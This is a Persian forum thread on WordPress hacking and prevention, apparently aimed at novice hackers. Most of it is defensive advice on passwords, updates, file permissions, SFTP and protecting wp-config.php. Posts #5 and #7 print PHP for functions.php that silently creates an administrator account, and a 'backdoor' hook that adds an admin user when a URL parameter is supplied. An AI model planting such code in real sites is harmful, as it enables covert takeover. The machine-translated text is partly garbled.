SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

WordPress Website Hacking & Prevention 2021

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    WordPress Website Hacking & Prevention 2021

    وردپرس پرکاربردترین سیستم مدیریت محتوای جهان است. بیش از 63٪ سایت های ایجاد شده تا به امروز از این CMS ایجاد شده اند و این باعث می شود که هدف مورد نظر هکرها باشد. واقعیتی که وردپرس را بیشتر در معرض هک شدن قرار می دهد این است که از تعداد زیادی افزونه که منبع باز دارند استفاده می کند و این پلاگین ها ممکن است حاوی برخی کدها و اسکریپت های مخرب باشند که یک هکر را با بستر های نرم افزاری برای تزریق بدافزار در وردپرس و انجام فعالیت های جاسوسی فراهم می کند.

    وردپرس یک فناوری بزرگ است ، حداقل توسط 28،183،568 وب سایت زنده در سال 2021 استفاده می شود.
    برای دیدن سایز بزرگ روی عکس کلیک کنید نام: trends-of-sites-built-with-wordpress-cms.png مشاهده: 279 حجم: 30.7 کیلو بایت

    WordPress Websites Count By Industry
    Internet and Telecom 97,191 20 %
    Technology 62,598 13 %
    Food and Drink 60,054 12 %
    Art and Entertainment 41,690 8 %
    Sport 37,259 8 %
    Books and Litterature 25,389 5 %
    Education and Career 20,830 4 %
    Home and Garden 20,095 4 %
    Animal 14,713 3 %
    Hobby and Leisure 14,500 3 %
    Automotive 13,133 3 %
    Law and Government 11,830 2 %
    Game 11,797 2 %
    Health 11,125 2 %
    News 10,247 2 %
    Real Estate 9,076 2 %
    Industry 8,721 2 %
    Travel 7,437 1 %
    Beauty and Fitness 7,262 1 %
    Finance 5,342 1 %
    Science 4,578 1 %
    Shopping 1,728 0 %
    حتماً از خود می پرسید که چگونه هکر ها می تواند ورود به وب سایت وردپرس را بای پس کنند. در این پست ، شما در مورد چگونگی هک شدن وردپرس ، دلایلی که منجر به هک وب سایت می شود ، تکنیک های مختلف هک برای هک شدن سایت وردپرس و نکاتی برای جلوگیری از تهدید امنیتی بیشتر خواهید دانست.

    توجه: هدف این مقاله فقط ارائه اطلاعات اولیه در مورد نحوه ورود به سایت وردپرس یا دور زدن ورود به سیستم است. این راهنما فقط برای اهداف آموزشی است. از تکنیک های ذکر شده هک وردپرس نباید برای بهره برداری استفاده شود .
    برای دیدن سایز بزرگ روی عکس کلیک کنید نام: wordpress-cms-distribution-stat.gif مشاهده: 258 حجم: 24.6 کیلو بایت


    امنیت سایت وردپرس شما وقتی با روش هایی متعدد نفوذ هک شود ، میتواند زیر سوال برود. اگر هسته ، پلاگین ها و CMS خود را به روز کنید، در برخی مواقع هک وب سایت می تواند ماهها یا سالها طول بکشد.

    با داشتن برخی آسیب پذیری های اساسی در افزونه ها ، یک سایت وردپرسی که روی امنیت آن کار نشده است ، درگاهی برای هکرهایی است که می خواهند اطلاعات شما را بازیابی کنند یا به سادگی وب سایت شما را مورد هدف قرار دهند . و می تواند منجر به مخدوش شدن سایت وردپرس شما توسط هکرها شود.

    نصب افزونه های امنیتی wordpress از ابتدای ایجاد سایت بسیار مهم است تا در طول سال مجبور به مبارزه با نفوذ نشوید.

    به همین دلیل است که در این راهنما قصد داریم تمام تکنیک های هک و آسیب پذیری هایی را که وب سایت وردپرس شما را در معرض هک شدن قرار می دهد و بهترین روش ها برای اطمینان از امنیت وردپرس را به شما ارائه دهیم. گرچه وردپرس بیشتر در معرض هک شدن است اما به این معنی نیست که سایر CMS ها ایمن هستند. آنها نیز هک می شوند.


    -----------------------------SAFE MASTER---------------------------
    تاپیک هکر های تازه وارد
    برچسب ها: هیچ یک
  • #2
    تهدیدهای ایجاد شده علیه وب سایت شما می تواند از سه منبع مختلف باشد.

    ابتدا ربات ها (ربات ها). آنها از طریق رایانه راه اندازی می شوند و سایت های مختلفی را هدف قرار می دهند تا آسیب ببینند. سریع ، کارآمد ، آنها تا حد امکان از نقص ها و آسیب پذیری های امنیتی در برنامه ها ، پلاگین ها و مضامین بهره برداری می کنند.

    آسیب پذیری ها تاکنون برای توسعه دهندگان ناشناخته بوده و باید از طریق به روزرسانی ها و وصله ها اصلاح شوند. حملات ربات خصوصاً تهاجمی است و بنابراین به راحتی قابل تشخیص است.

    Botnets ، مشابه ربات ها است ، اما از شبکه رایانه هایی که توسط بدافزار کنترل می شوند ، راه اندازی می شود. در غیر این صورت ارتش های زامبی خوانده می شوند ، آسیب آنها قابل توجه است زیرا می تواند به طور همزمان به بسیاری از سایتها آسیب برساند.

    سرانجام ، مخرب ترین از همه ، حمله انسانی است. یک فرد طبیعی در پشت صفحه خود به وب سایت شما حمله کرده و عناصر آسیب پذیر را جستجو می کند. تشخیص این نوع حمله دشوار است زیرا انسانها احتیاط بیشتری نسبت به ربات ها یا بات نت ها دارند.

    اگرچه یک هکر می تواند همزمان فقط به یک سایت حمله کند ، اما حمله اومیتواند توسط ایجاد کلمات کلیدی و اتفاده از موتورهای جستجو بسیار وسیع تر باشد . هکر قصد دارد وب سایت هایی را در مقیاس وسیع هدف قرار دهد که داده های مهمی را ذخیره می کنند مورد نفوذ قرار دهد ، پس از به سرقت رفتن ، به راحتی با قیمت های بالا قابل فروش هستند. همانند دیتابیس های موجود در دارک وب

    مهمترین دلایلی که منجر به هک شدن وردپرس می شود
    با این اوصاف ، بیایید نگاهی به برخی از مهمترین دلایل هک شدن سایت های وردپرس و چگونگی جلوگیری از هک شدن وب سایت خود بیاندازیم.
    میزبانی وبسایت بدون امنیت | Reason 1. Unsecured web hosting

    یکی از دلایل مهم نفوذ در سرتاسر جهان آسیب پذیر بودن سایتهای روی یک سرور میباشد ، یعنی اگر شما ااز امنیت بالایی هم برخوردار باشید اما میزبان هاست شما از لحاظ امنیت ضعیف باشد باید با اطلاعات خود خداحافظی کنید ، متود های سرور هکینگ ، کرنل هکینگ و سیمیلینک هر روزه در حال بروز رسانی میباشد و ادمین های میزبانی سرور باید بسیار دقیق و بروز باشند .

    برای دیدن سایز بزرگ روی عکس کلیک کنید نام: Unsecured-web-hosting.jpg مشاهده: 281 حجم: 40.8 کیلو بایت
    مانند همه وب سایت ها ، سایت های وردپرس نیز بر روی یک سرور وب میزبانی می شوند. برخی از شرکت های میزبان از امنیت بستر میزبانی خود غافل می شوند. این به ویژه اغلب در مورد هاست رایگان ، نامحدود یا کم هزینه اتفاق می افتد.

    با انتخاب بهترین ارائه دهنده میزبانی وردپرس برای وب سایت خود به راحتی می توانید از این امر جلوگیری کنید.


    دلیل 2. گذرواژه های ضعیف


    برای دیدن سایز بزرگ روی عکس کلیک کنید نام: wordpress-password-hacking-techniques.png مشاهده: 257 حجم: 56.3 کیلو بایت
    رمزهای عبور کلیدهای سایت وردپرس شما هستند. شما باید اطمینان حاصل کنید که از یک رمز عبور منحصر به فرد قوی برای هر یک از حساب های زیر استفاده می کنید زیرا همه آنها می توانند دسترسی کامل به وب سایت شما را برای هکر فراهم کنند.

    حساب مدیر وردپرس شما
    حساب پنل کنترل میزبانی وب CPanel
    حساب های FTP
    پایگاه داده MySQL مورد استفاده برای سایت وردپرس شما
    حساب های ایمیل استفاده شده برای مدیر وردپرس یا حساب میزبانی
    همه این حساب ها با رمز عبور محافظت می شوند. استفاده از رمزهای عبور ضعیف باعث می شود که هکرها با استفاده از ابزارهای اصلی هک کردن رمزهای عبور خود را راحت کنند.

    با استفاده از رمزهای عبور منحصر به فرد و قوی برای هر حساب می توانید به راحتی از این امر جلوگیری کنید.



    دلیل 3. دسترسی محافظت نشده به مدیر وردپرس (دایرکتوری wp-admin)
    قسمت مدیریت وردپرس به کاربر اجازه می دهد تا به اقدامات مختلف در سایت وردپرس شما دسترسی پیدا کند. همچنین حساس ترین منطقه مورد حمله میباشد .

    محافظت نکردن از آن باعث می شود هکرها روش های مختلفی را برای شکستن وب سایت شما امتحان کنند. با افزودن لایه های تأیید اعتبار به فهرست مدیریت وردپرس می توانید برای آنها مشکل ایجاد کنید.

    اول از همه ، شما باید از قسمت مدیریت وردپرس خود با رمز عبور محافظت کنید. این یک لایه امنیتی اضافی اضافه می کند ، و هر کسی که بخواهد به مدیر وردپرس دسترسی پیدا کند باید یک رمز عبور اضافی ارائه دهد.

    اگر از یک سایت وردپرس چند نویسنده یا چند کاربره استفاده می کنید ، می توانید رمزهای عبور قوی را برای همه کاربران سایت خود اعمال کنید.

    همچنین می توانید احراز هویت دو عاملی را اضافه کنید تا دسترسی به منطقه مدیر وردپرس شما برای هکرها دشوارتر شود.


    دلیل 4. مجوزهای پرونده نادرست است
    مجوزهای پرونده مجموعه قوانینی است که توسط سرور وب شما استفاده می شود. این مجوزها به سرور وب شما کمک می کند تا دسترسی به پرونده های سایت خود را کنترل کند. مجوزهای نادرست پرونده / پوشه می تواند به مهاجم اجازه نوشتن و اصلاح دسترسی به این پرونده ها را بدهد.

    ارزش کلیه پرونده های وردپرس شما باید 644 به عنوان اجازه پرونده باشد. تمام پوشه های سایت وردپرسی شما باید دارای اجازه 755 به عنوان یک پرونده باشند. همچنین در تمامی دایرکتوری ها از فایل ایندکس برای جلوگیری از رویت فایل ها و دایرکتوری indexing استفاده شود .


    -----------------------------SAFE MASTER---------------------------
    تاپیک هکر های تازه وارد

    نظر

    • #3
      دلیل 5. وردپرس بروز نشده

      wordpress-core-update
      برای دیدن سایز بزرگ روی عکس کلیک کنید نام: wordpress-core-update.png مشاهده: 275 حجم: 4.6 کیلو بایت
      برخی از کاربران وردپرس می ترسند سایت های وردپرس خود را به روز کنند ، زیرا می ترسند که این باعث کاهش عملکرد وب سایت آنها شود. هر نسخه جدید وردپرس اشکالات و آسیب پذیری های امنیتی را برطرف می کند.

      اگر وردپرس را به روز نکنید ، عمدا سایت خود را آسیب پذیر می کنید.

      اگر نگران هستید که به روزرسانی وب سایت شما را خراب کند ، می توانید قبل از شروع به روزرسانی ، نسخه پشتیبان کامل وردپرس ایجاد کنید.

      به این ترتیب اگر مشکلی کار نکرد ، می توانید به راحتی به نسخه قبلی برگردید.
      دلیل 6. افزونه ها یا پوسته های آسیب پذیر
      درست مانند نرم افزار اصلی وردپرس ، پلاگین ها و امنیت قالب وردپرس نیز مهم هستند. استفاده از یک افزونه یا پوسته قدیمی می تواند سایت شما را آسیب پذیر کند.

      اشکالات و اشکالات امنیتی اغلب در افزونه ها و تم های وردپرس کشف می شود. معمولاً نویسندگان طرح پوسته و پلاگین به سرعت آنها را برطرف می کنند. با این حال ، اگر یک کاربر طرح زمینه یا افزونه خود را به روز نکند ، هیچ کاری نمی تواند در این زمینه انجام دهد.

      حتماً تم و افزونه های وردپرس خود را به روز نگه دارید و قبل از انجام نصب جدید پوسته WP خنثی شده ، تم های وردپرس خود را اسکن کنید.

      افزونه های WP مستعد آسیب پذیری هستند. بسیار مهم است که خود را به روز نگه دارید. زیر این پست را بررسی کنید تا بفهمید چرا باید همیشه افزونه های خود را به روز نگه دارید و هر از چند گاهی آنها را وصله کنید.

      برخی از آسیب پذیری ها
      کد:
      Critical Vulnerability Exploit in WordPress Contact Form 7 Plugin
SQL Injection vulnerability in WordPress Ninja Forms Plugin Patched
Zero Day Vulnerability Exploit Rich Reviews Plugin
Vulnerability in convert Plus WordPress Plugin
      دلیل 7. استفاده از FTP به جای SFTP / SSH
      حساب های FTP برای بارگذاری پرونده ها در وب سرور شما با استفاده از سرویس گیرنده FTP استفاده می شود. بیشتر میزبانان وب با استفاده از پروتکل های مختلف از اتصالات FTP پشتیبانی می کنند. می توانید از طریق FTP ، SFTP یا SSH ساده وصل شوید.

      وقتی با استفاده از FTP ساده به سایت خود متصل می شوید ، رمزعبور شما بدون رمزگذاری به سرور ارسال می شود. می توان از آن جاسوسی کرد و به راحتی دزدید. به جای استفاده از FTP ، همیشه باید از SFTP یا SSH استفاده کنید.

      نیازی به تغییر سرویس گیرنده FTP خود نیستید. بیشتر سرویس گیرنده های FTP می توانند از طریق SFTP و SSH به وب سایت شما متصل شوند. شما فقط باید پروتکل را به "SFTP - SSH" هنگام اتصال به وب سایت خود تغییر دهید.

      همچنین می توانید از مدیر پرونده موجود در cPanel خود استفاده کنید. این یک ابزار قدرتمند و بصری است که ویژگی ارائه عملکرد فشرده سازی / رفع فشار (Zip / unzip) را در سرور دارد.

      دلیل 8. استفاده از Admin به عنوان نام های کاربری وردپرس
      استفاده از "مدیر" به عنوان نام کاربری وردپرس توصیه نمی شود. اگر نام کاربری سرپرست شما مدیر است ، باید بلافاصله آن را به نام کاربری دیگری تغییر دهید.
      -----------------------------SAFE MASTER---------------------------
      تاپیک هکر های تازه وارد

      نظر

      • #4
        دلیل 9. تم ها و افزونه های منسوخ شده
        بسیاری از سایت ها در اینترنت افزونه های پرداخت شده و تم های وردپرس را به صورت رایگان توزیع می کنند. گاهی وسوسه می شود از این پلاگین ها و تم های رایگان برای سایت خود استفاده کنید.

        بارگیری تم ها و افزونه های وردپرس از منابع غیر قابل اعتماد بسیار خطرناک است. آنها نه تنها می توانند امنیت وب سایت شما را به خطر بیاندازند ، بلکه می توانند برای سرقت اطلاعات حساس نیز مورد استفاده قرار گیرند.

        شما همیشه باید افزونه ها و تم های وردپرس را از منابع معتبری مانند وب سایت توسعه دهندگان پلاگین / قالب یا مخازن رسمی وردپرس بارگیری کنید.

        اگر توانایی پرداخت آن را ندارید یا نمی خواهید یک پلاگین یا طرح زمینه برتر بخرید ، همیشه گزینه های رایگان برای این محصولات وجود دارد. این افزونه های رایگان ممکن است عملکرد مشابه با نسخه های مشابه خود را نداشته باشند ، اما کار را به پایان می رسانند و از همه مهمتر ، امنیت وب سایت شما را حفظ می کنند.

        دلیل 10. عدم اطمینان از پیکربندی وردپرس در پرونده wp-config.php
        پرونده پیکربندی وردپرس wp-config.php حاوی اطلاعات اتصال پایگاه داده وردپرس شما است. اگر به خطر بیفتد ، اطلاعاتی را نشان می دهد که می تواند به هکر دسترسی کامل به وب سایت شما را بدهد.

        با محروم کردن دسترسی به پرونده wp-config با استفاده از .htaccess می توانید یک لایه محافظتی اضافی اضافه کنید. کافیست این کد کوچک را به پرونده .htaccess خود اضافه کنید.

        کد:
        <files wp-config.php>

order allow,deny

deny from all

</files>
        دلیل 11. پیشوند جدول WordPress را تغییر ندهید

        بسیاری از کارشناسان توصیه می کنند پیشوند جدول پیش فرض وردپرس را تغییر دهید. به طور پیش فرض ، وردپرس از wp_ به عنوان پیشوند جداول ایجاد شده در پایگاه داده شما استفاده می کند. شما می توانید هنگام نصب آن را تغییر دهید.

        توصیه می شود از پیشوند کمی پیچیده تر استفاده کنید. این کار حدس زدن نام جداول پایگاه داده شما را برای هکرها دشوارتر خواهد کرد.


        -----------------------------SAFE MASTER---------------------------
        تاپیک هکر های تازه وارد

        نظر

        • #5
          چگونه یک وب سایت وردپرس را هک کنیم - روش های ممکن

          بسته به اهداف آن ، یک حمله مخرب راه را برای احتمال هک شدن سایت وردپرس شما باز می کند.

          در اینجا بیشترین حملات و روشهایی که به سایتهای ایجاد شده توسط وردپرس مربوط می شود آورده شده است:

          1- ایجاد کاربران جدید از طریق FTP
          وقتی HTTP از دسترس هکرها خارج باشد ، آنها سعی می کنند به سرور FTP دسترسی پیدا کنند و سطح مدیر جدید ایجاد کنند. برای ایجاد یک حساب کاربری در خارج از محیط مدیریت وردپرس ، تمام چیزی که نیاز دارند دسترسی FTP به سایت است.

          وی به عنوان سرپرست ، تمام اطلاعات لازم برای اتصال به سرور و در نتیجه ایجاد حساب های کاربری جدید با ایجاد عملکرد جدید با استفاده از طرح زمینه شما را در اختیار خواهد داشت.

          2 - توابع.php
          برای دستیابی به این روش دو راه وجود دارد ، اولاً با ویرایش funtions.php از طریق cPanel و دوم با استفاده از سرویس گیرنده FTP برای دستیابی به این هدف. با استفاده از cPanel ، هکرها File Manager را باز کرده و پوشه تم فعال را پیدا می کنند.

          از آنجا باید به پوشه public_html / wp_content / themes بروید و پوسته را پیدا کنید. تنها چیزی که باقی مانده این است که پرونده او را باز کنید و عملکردهای.php را ویرایش کنید.

          کد باید قبل از برچسب بسته شدن اضافه شود و هک انجام شود. فراموش نکنید که رمز عبور را نیز تغییر دهید. پس از ایجاد حساب جدید ، هکرها کد را از فایل functions.php حذف می کنند.

          3 - استفاده از Cpanel / MySQL
          از این روش برای تغییر گذرواژه (یا نام کاربری در صورت لزوم) کاربر موجود یا ایجاد حساب جدید استفاده کنید. شما به دسترسی cPanel یا دسترسی مستقیم MySQL به پایگاه داده سایت نیاز دارید. بیایید با تغییر رمز ورود کاربر موجود شروع کنیم.

          اگر از cPanel استفاده می کنید ، وارد شوید (cPanel همیشه از طریق پیوند https://yoursite.com:2083 قابل دسترسی است) ، phpMyAdmin را پیدا کرده و باز کنید. لیست پایگاه داده ها و جداول در سمت چپ است. شما به دنبال جدولی هستید که به _ کاربر ختم شود. احتمالاً wp_users خواهد بود ، اما اگر بیش از یک سایت WordPress روی سرور نصب کرده اید ، باید سایت مناسب را پیدا کنید.

          در جدول مناسب ، کاربری که می خواهید ویرایش کنید در آن است. اگر از طریق برخی از سرویس گیرندگان خارجی مانند SQLyog به MySQL متصل شدید ، همین روش را دنبال کنید. هنگامی که جدول و رکورد واقعی کاربر را پیدا کردید ، زمان تغییر رمز عبور فرا رسیده است.

          همانطور که احتمالاً تاکنون فهمیده اید ، رمز ورود در قسمت user_pass ذخیره شده و با استفاده از الگوریتم MD5 هش شده است. ژنراتور آنلاین MD5 را باز کنید و رمز عبوری را که می خواهید استفاده کنید وارد کنید و روی "Hash" کلیک کنید. رشته تولید شده را کپی کرده و رمز عبور اصلی را با آن جایگزین کنید. در phpMyAdmin می توانید با دوبار کلیک بر روی قسمت ، آن را ویرایش کنید. روش کار مشابه سایر کلاینت های MySQL است. تغییرات را ذخیره کرده و با رمز عبور جدید خود وارد وردپرس شوید.

          4- ایجاد حساب کاربری جدید از طریق FTP
          حساب های FTP معمولاً توسط کاربرانی استفاده می شود که می خواهند از طریق یک فهرست در سایت خود منطقه ای ایجاد کنند تا امکان بارگذاری و بارگیری پرونده ها را برای افراد خاصی با نام کاربری و رمزعبور که خود اختصاص می دهند ، فراهم کنند.

          با استفاده از دامنه و پوشه مورد استفاده ، تمام پرونده های منتشر شده در این منطقه از طریق اینترنت نیز قابل مشاهده هستند.

          برای ایجاد یک حساب FTP در سایت خود ، به صفحه کنترل خود در نماد "حساب های FTP" دسترسی پیدا کنید. در این قسمت ، می توانید برای بارگذاری یا بارگیری پرونده ها ، دسترسی به منطقه خاصی از سایت خود را پیکربندی کنید:

          داده های درخواستی را وارد کنید:
          کاربر یا ورود به سیستم: نام کاربری حساب جدید FTP.
          رمز عبور: رمز عبوری که می خواهید برای دسترسی از طریق FTP به این حساب اختصاص دهید
          Directory: فهرست داخل سایت که از طریق FTP قابل دسترسی است ، بطور خودکار همان کاربر بدون @ mydomain.com است ، اما قابل تغییر است. این دایرکتوری اگر قبلاً ایجاد نشده باشد ، به صورت خودکار ایجاد می شود. اگر این قسمت خالی بماند ، حساب جدید FTP می تواند به تمام فهرستهای موجود در سایت دسترسی پیدا کند. توصیه نمی شود ، بنابراین توصیه می کنیم فقط به پوشه public_html دسترسی داشته باشید ، به عنوان مثال ، اگر می خواهید به سایت خود اجازه دسترسی دهید به طراح وب خود برای بارگذاری پرونده ها و دایرکتوری های مربوط به سایت خود ، بدون امکان ورود به داده های اصلی حساب خود را در پوشه public_html بنویسید.
          Quota: این فضایی در Mb است که می خواهید به این پوشه اختصاص دهید ، می تواند نامحدود باشد یا محدودیت فضا را تعیین کند تا تمام منابع میزبانی شما را اشغال نکند.
          اکنون کافیست دکمه ایجاد را فشار دهید تا حساب FTP جدید ایجاد شود.
          کاربر حساب جدید FTP باید با استفاده از یک برنامه و با داده های زیر از طریق FTP به سایت دسترسی پیدا کند:

          کد:
          Address / Host Name / Address: yourdomain.com or ftp.yourdomain.com

User / User: [email protected]

Password: El password assigned to this FTP account
          پورت : 21

          با استفاده از این ، شما فقط برای بارگذاری و بارگیری پرونده ها ، وارد پوشه مشخص شده در سایت خود می شوید.

          کد:
          The new user will have read and write permissions both on the chosen directory and on all the subdirectories it contains.

For example, if you create the client user and give him access to the / home / user / public_html / client directory (http://www.yourdomain.com/client), that user can add, delete, edit, and so on. all files in / home / user / public_html / client (http://www.yourdomain.com/client), and any subdirectory contained in the client directory (for example, / home / user / public_html / client / images - > http://www.yourdomain.com/client/images).
          توجه: در اطلاعات ارائه شده yourdomain.com را به دامنه خود تغییر دهید.

          ایجاد حساب های کاربری جدید در وردپرس بسیار آسان است. به عنوان مدیر ، باید به صفحه مدیر کاربران بروید که در آن می توانید برای هر نقش کاربری حساب جدید ایجاد کنید. این کار در عرض چند ثانیه انجام می شود و یک کاربر تازه ایجاد شده می تواند بلافاصله با نام کاربری و رمز عبور داده شده وارد سیستم شود.

          یک حساب کاربری جدید از طریق FTP ایجاد کنید:

          سرویس گیرنده FTP را باز کرده و به حساب خود متصل شوید
          به wp-content / themes بروید
          پوشه تمی را که استفاده می کنید باز کنید
          فایل functions.php را جستجو کرده و آن را ویرایش کنید
          عملکرد زیر را کپی و پیست کنید:

          کد:
          function admin_account(){

$user = 'Username';

$pass = 'Password';

$email = '[email protected]';

if ( !username_exists( $user ) && !email_exists(

$email ) ) {

$user_id = wp_create_user( $user, $pass, $email );

$user = new WP_User( $user_id );

$user->set_role( 'administrator' );

} }

add_action('init','admin_account');
          کد:
          Change username, password, and email to something unique
Save changes
          -----------------------------SAFE MASTER---------------------------
          تاپیک هکر های تازه وارد

          نظر

          • #6
            تکنیک ها / بهره برداری های مورد استفاده برای هک وردپرس
            حملات مرد در میانه
            برای کاربران این امکان وجود دارد که از حملات مردمی در برابر کسانی که شبکه LAN یکسانی دارند استفاده کنند. تا زمانی که اطلاعات ورود به سیستم با یک تونل VPN یا کد دیگری مانند HTTPS رمزگذاری نشده باشد ، اطلاعات ورود به سیستم به صورت متن ساده قابل مشاهده است. نرم افزاری که بیشتر کاربران را قادر می سازد از این نوع حمله استفاده کنند می تواند افزونه های بی رحمانه ای را اعمال کند ، مضامین آسیب پذیر را شناسایی کند و کاربران را برشمرد.

            بروت فورس
            رباتها ترکیبات مختلفی از نام کاربری و رمز ورود شما را امتحان می کنند. این روش ساده ترین راه دسترسی هکر به وب سایت شما است. افزونه ها امکان متوقف کردن بروت فورس را فراهم می کنند. نیاز به احراز هویت دو عاملی نیز خطر هک شدن را کاهش می دهد.

            حمله XSS در وردپرس
            برای دیدن سایز بزرگ روی عکس کلیک کنید نام: Diagram-XSS-Attack-wordpress.gif مشاهده: 268 حجم: 29.9 کیلو بایت


            در این حمله کدهای مخرب JavaScript را به صفحات وردپرس شما تزریق می کنند. به این ترتیب ، آنها می توانند کوکی های ذخیره شده در طول جلسه کاربر را بازیابی کنند. پس از آن آنها این شانس را دارند که با شناساندن خود به عنوان کاربر ، خود را جعل کنند. نصب فایروال امکان جلوگیری از این نوع حمله و مشکلات زیادی را برای مشتریان فراهم می کند. همچنین از بروز بودن پلاگین و هسته حتما اطمینان حاصل نمائید .

            -----------------------------SAFE MASTER---------------------------
            تاپیک هکر های تازه وارد

            نظر

            • #7
              حملات تزریق دستور SQL

              هدف اصلی این حمله کاهش عملکرد یک سایت ، سرقت داده ها یا حتی حذف یا خراب کردن آنها است. سفارشات به قسمتهای ورودی سایت شما تزریق می شوند (برای مثال صفحه شناسایی). فایروال و بررسی فیلتری خوب (برای حذف دائمی اطلاعات حساس) مورد نیاز است. البته باید دقت داشته باشید رول های آپدیت فایروال بروز باشند زیرا میتوان فایروال ها را در حملات تزریق SQL دور زد .
              برای دیدن سایز بزرگ روی عکس کلیک کنید نام: SQL-Injection-Attacks.jpg مشاهده: 271 حجم: 49.2 کیلو بایت



              تزریق پشت در
              وقتی هکرها متوجه می شوند درب ورودی بسته است ، سعی می کنند به درب پشتی دسترسی پیدا کنند. به نظر می رسد یک روش مخرب برای استفاده از کد برای دسترسی و کنترل سایت است ، اما گاهی حتی صاحبان سایت برای کنترل وب سایت خود از این روش استفاده می کنند. مواردی وجود دارد که درب ورودی برای دسترسی هکرها به سایت وردپرس شما باز نمی شود ، اما در آن صورت ممکن است درب عقب آسیب پذیر باشد و هکرها سعی در دسترسی مستقیم دارند.

              این امر عمدتا زمانی اتفاق می افتد که کمی کد پشت محیط وردپرس شما مخفی شده باشد و هکرها بتوانند با امتیازات مدیر به سایت وردپرس دسترسی پیدا کنند. این اطلاعات را می توان حذف کرد و پشتیبان گیری ها را هزار بار بازیابی کرد ، اما بیشتر اوقات ، مالک چیزی در مورد ورودی های پشت در نمی داند.


              ایجاد درپشتی در وردپرس:
              در اینجا یک قطعه کد وجود دارد که برای انجام کار به آن نیاز خواهید داشت:

              فایل funtion.php را باز کنید
              کد زیر را کپی / جای گذاری کنید:

              کد:
              add_action('wp_head', 'wploop_backdoor');
function wploop_backdoor() {
If ($_GET['backdoor'] == 'how to hack wordpress') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
              اگر کد را همانطور که هست بگذارید ، تنها کاری که برای ایجاد مدیر جدید در سایت باید انجام دهید مراجعه به =http://www.yourdomain.com/?backdoor است.
              -----------------------------SAFE MASTER---------------------------
              تاپیک هکر های تازه وارد

              نظر

              • #8
                جکینگ رمزنگاری ، استخراج ارز رمزنگاری شده
                ظهور ارزهای رمزپایه و اشتیاق بیت کوین تهدیدهای جدیدی را ایجاد کرده است مانند Cryptojacking که به آن استخراج ارزهای رمزپایه مخرب نیز می گویند. هکرها برای سو استفاده از رمزنگاری در پس زمینه و ایجاد سود به روش پنهان ، نرم افزاری را برای تخریب سیستم ها و منابع یک ماشین (رایانه شخصی ، تلفن هوشمند ، سرور و ...) معرفی می کنند.
                برای دیدن سایز بزرگ روی عکس کلیک کنید نام: Wordpress-Japanese-Keyword-Hack-Search (1).png مشاهده: 280 حجم: 63.5 کیلو بایت



                در هک کلمات کلیدی ژاپنی ، متن ژاپنی ایجاد شده به صورت خودکار در سایت شما ظاهر می شود. این روش Blackhat SEO با نمایش کلمات ژاپنی در عنوان و شرح صفحات آلوده ، نتایج جستجوی Google را رد می کند. این اتفاق زمانی می افتد که صفحات وب مختلفی به موتورهای جستجو و بازدیدکنندگان عادی ارائه شوند. این حمله همچنین به عنوان "کلمه کلیدی ژاپنی هک" ، "هرزنامه جستجوی ژاپنی" یا "هرزنامه نماد ژاپنی" شناخته می شود.

                فیشینگ یکی از رایج ترین اصطلاحات هکری است که توسط افسران امنیتی استفاده می شود. این تکنیکی است که کاربران را فریب می دهد تا اطلاعات حساس (مانند نام کاربری ، رمزهای عبور یا داده های کارت اعتباری) را به منابع ظاهراً بی خطر فاش کنند.

                یک فیشر خود را به عنوان موجودی قابل اعتماد مبدل می کند و با قربانیان احتمالی تماس می گیرد و از آنها می خواهد اطلاعات را فاش کنند.

                به عنوان مثال ، یک فیشر ممکن است به عنوان یک بانک مطرح شود و از طریق ایمیل اعتبار حساب بانکی کاربر را درخواست کند. همچنین می تواند شما را فریب دهد تا روی پیوند جعلی کلیک کنید.

                برای اینکه بدانید چگونه باید از خود محافظت کنید ، باید بفهمید حمله فیشینگ چیست ، انواع مختلفی دارد و چگونه می توانید آن را تشخیص دهید و چگونه فیشینگ را از سایت وردپرس حذف کنید.

                بد افزار
                هر روز وب سایت های آلوده به حملات بدافزار را می شنوید ، بنابراین بهتر است این اصطلاحات هک را بهتر بشناسیم.

                Malware نرم افزاری است که توسط هکرها برای ربودن سیستم های رایانه ای یا سرقت اطلاعات حساس از دستگاه طراحی شده است. آنها نامهای مختلفی مانند ویروس ، تبلیغات تبلیغاتی ، جاسوس افزار ، keylogger و غیره دارند. بدافزارها از طریق ابزارهای مختلفی مانند USB ، هارد دیسک یا هرزنامه به سیستم منتقل می شوند.

                یکی از موارد رایج در مورد بدافزارهایی که در سال 2021 در کمین هستند ، بدافزار WP-VCD و بدافزار تغییر مسیر دهنده است که وب سایت شما را به سایت هرزنامه هدایت می کند. در اینجا درباره بدافزار تغییر مسیر بیشتر بدانید.

                به عنوان مثال ، یک بدافزار اخیر با هدایت Opencart و Magento دسک تاپ و موبایل وب سایت های WP به پیوندهای مخرب کار کرده است. این اساساً منجر به از دست دادن شهرت ، اعتبار و مهمتر از همه تأثیر بد بر رتبه بندی موتورهای جستجو می شود.

                -----------------------------SAFE MASTER---------------------------
                تاپیک هکر های تازه وارد

                نظر

                • #9
                  باج افزار WordPress

                  برای دیدن سایز بزرگ روی عکس کلیک کنید نام: WordPress-Ransomware.jpg مشاهده: 275 حجم: 38.7 کیلو بایت

                  Ransomware نوعی بدافزار است که دسترسی کاربر به سیستم خود را مسدود کرده و دسترسی به پرونده های وی را قطع می کند. یک پیام باج نمایش داده می شود که مقدار و محل پرداخت را نشان می دهد ، که معمولاً بصورت بیت کوین در ازای آزاد سازی فایل ها درخواست میشود .


                  این حملات نه تنها افراد بلکه بانک ها ، بیمارستان ها و مشاغل آنلاین را تحت تأثیر قرار می دهد. یک نمونه بسیار اخیر از این نوع باج حمله پتیا است که اخیراً تجارت در سراسر جهان را به طوفان کشاند.


                  Cross-site scripting or cross-site scripting (XSS)
                  برای دیدن سایز بزرگ روی عکس کلیک کنید نام: persistent-xss-attack-wordpress.png مشاهده: 253 حجم: 103.3 کیلو بایت



                  هکرهایی که از این روش استفاده می کنند با تزریق محتوا به صفحه حملات XSS را انجام می دهند که باعث خراب شدن مرورگر هدف می شود.

